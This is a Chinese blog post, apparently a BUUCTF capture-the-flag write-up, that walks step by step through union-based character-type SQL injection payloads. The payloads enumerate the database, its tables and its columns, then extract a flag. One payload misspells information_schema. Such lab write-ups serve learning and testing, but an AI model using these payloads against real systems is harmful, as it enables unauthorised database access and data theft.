Buuctf web第一章[字符型注入]

hyhyxyx

已于 2023-07-26 21:29:57 修改

阅读量93

点赞数

文章标签： sql

于 2023-07-26 19:51:13 首次发布

本文链接：https://blog.csdn.net/hyhyxyx/article/details/131946478

版权

字符型注入

（Buuctf web第一章）

输入：id=1 and 1=1--+
     id=1 and 1=2--+
     [页面无变化，证明不是整数型注入]

输入：id=1' and 1=1--+
     id=1' and 1=2--+
     [页面出现报错，为字符型注入]

在这里插入图片描述

输入：
id=1' order by 3--+     [产生回显，证明字段数为3]

输入：
id=-1' union select 1,2,3

在这里插入图片描述

注入位置为2;

输入：
?id=-1' union select 1,database(),3 --+

在这里插入图片描述

数据库名为note；

输入：
id=-1' union select 1,2,group_concat(table_name)from information_shema.tables where table_schema=database()--+

在这里插入图片描述

id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fl4g'--+

在这里插入图片描述

id=-1' union select 1,database(), group_concat(fllllag) from fl4g --+

在这里插入图片描述

得到flag；

关注